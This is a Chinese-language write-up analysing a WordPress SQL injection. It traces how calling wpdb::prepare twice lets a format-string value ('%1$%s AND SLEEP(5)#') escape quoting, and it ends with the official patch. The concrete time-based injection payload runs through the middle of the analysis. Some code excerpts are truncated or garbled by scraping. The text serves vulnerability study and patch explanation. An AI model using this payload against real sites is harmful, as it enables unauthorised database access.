$object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key ) );}
调用了两个prepare函数 跟进prepare函数
public function prepare( $query, $args ) {if ( is_null( $query ) )return;// This is not meant to be foolproof -- but it will catch obviously incorrect usage.if ( strpos( $query, '%' ) === false ) {_doing_it_wrong( 'wpdb::prepare', sprintf( __( 'The query argument of %s must have a placeholder.' ), 'wpdb::prepare' ), '3.9.0' );}$args = func_get_args;array_shift( $args );// If args were passed as an array (as in vsprintf), move them upif ( isset( $args[0] ) && is_array($args[0]) )$args = $args[0];$query = str_replace( "'%s'", '%s', $query ); // in case someone mistakenly already singlequoted it$query = str_replace( '"%s"', '%s', $query ); // doublequote unquoting$query = preg_replace( '|(?
详细看prepare函数对传入参数的处理过程 首先对%s进行处理
$query = str_replace( "'%s'", '%s', $query ); // in case someone mistakenly already singlequoted it$query = str_replace( '"%s"', '%s', $query ); // doublequote unquoting$query = preg_replace( '|(?
把'%s'替换为%s,然后再把"%s"替换成%s,替换为浮点数%F 把%s替换成'%s' 最后再进行vsprintf( q u e r y ,args ); 对拼接的语句进行格式化处理
我们一步步分析 假设传入的$meta_value为'admin'
$wpdb->prepare( " AND meta_value = %s", $meta_value );
经过prepare函数处理后得到
vsprintf( " AND meta_value = '%s'",'admin')=> AND meta_value = 'admin'
return到上一级函数后,继续执行这一条拼接语句:
$wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key )
经过prepare函数处理后得到
vsprintf( "SELECT $type_column FROM $table WHERE meta_key = '%s' AND meta_value = 'admin'",'admin')=> SELECT $type_column FROM $table WHERE meta_key = 'admin' AND meta_value = 'admin'
看起来一切都很正常,毫无bug 但是我们可以思考一下,怎样使其形成注入呢?s> 或者说怎样逃逸一个单引号? 在之前我们先看一下,可控变量 $post_id_del 的路线
$post_id_del => $post_id => $meta_value => $args => $query
显然这里面两处admin都有单引号,而且两处都与 $post_id_del 联系,如何来选择?
对于第一处单引号 它是通过一次替换处理得到的,显然是对单引号>无法处理 对于第二处单引号 经过两次的替换,(这里的意思是执行了两次的替换代码,可能第二段代码对他没有起到实质性的作用,仅仅是去点单引号然后又加上单引号) 但是这一出经过了两次处理是必须的,那么我们是否能够是构造出另一个单引号(此时第二处有三个单引号)就可以闭合前面的单引号了
最重要的是,第二次的替换处理的变量是可控的,因此要引入单引号,我们需要$meta_value含有%s 那么第一次的结果为
AND meta_value = 'X%sY'(其中XY为未知量)//这里需要注意,为什么%s不被单引号围起来,我看过一篇博客,它是写的'%s',这显然是错的,为什么呢?我们生成了'%s'是没错,不过还原一下过程就知道了,首先我们生成了AND meta_value = '%s',注意此时与$meta_value没有半毛钱关系,后来的vsprintf后,才与$meta_value有了关系,原来的%s被替换成了X%sY,值得注意的是这里的%s没有经过任何处理,处理是在第二轮进行的,这是后话。
第二次后的结果为
SELECT $type_column FROM $table WHERE meta_key = 'admin' AND meta_value = 'X'%s'Y'(对于第二处的%s我们先不要带入格式化后的值,其实真实的语句应该为:SELECT $type_column FROM $table WHERE meta_key = 'admin' AND meta_value = 'X'admin'Y')
分析到这里,相信大家应该知道传值($meta_value)使单引号逃逸出来了吧
admin显然是多余的,那么我们需要把它放在单引号里面,因此第二个单引号需要去掉,那么第四个单引号需要注释掉,这就很轻而易举地构造sql语句 AND meta_value = 'Xadmin'Y Y里面就是我们注入的代码漏洞利用
怎么去传值呢? 利用格式化字符串漏洞
去掉第二个单引号就需要使该单引号成为%后的第一个字符,也就是%',但是我们还需要一个占位符,%1$' 这样就没有报错的去掉了该单引号
所以我们构造的payload为
$meta_value = %1$%s AND SLEEP(5)#=> AND meta_value = '%1$%s AND SLEEP(5)'=> "SELECT $type_column FROM $table WHERE meta_key = '%s' AND meta_value = AND meta_value = '%1$'%s' AND SLEEP(5)#'",'admin'其中 %1$' => 空=> SELECT $type_column FROM $table WHERE meta_key = 'admin' AND meta_value = AND meta_value = 'admin' AND SLEEP(5)#'成功利用该漏洞形成时间注入
漏洞修补
现在我们说一下第四部分开头的补救方法 后来官方在prepare函数加了这一代码
$query = preg_replace( '/%(?:%|$|([^dsF]))/', '%%1', $query ); // escape any unescaped percents
只允许 %后面出现dsF 这三种字符类型, 其他字符类型都替换为%%1, 而且还禁止了%, $ 这种参数定位
了解投稿详情点击—— 重金悬赏 | 合天原创投稿涨稿费啦!
我想知道你“在看” 返回搜狐,查看更多
727
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
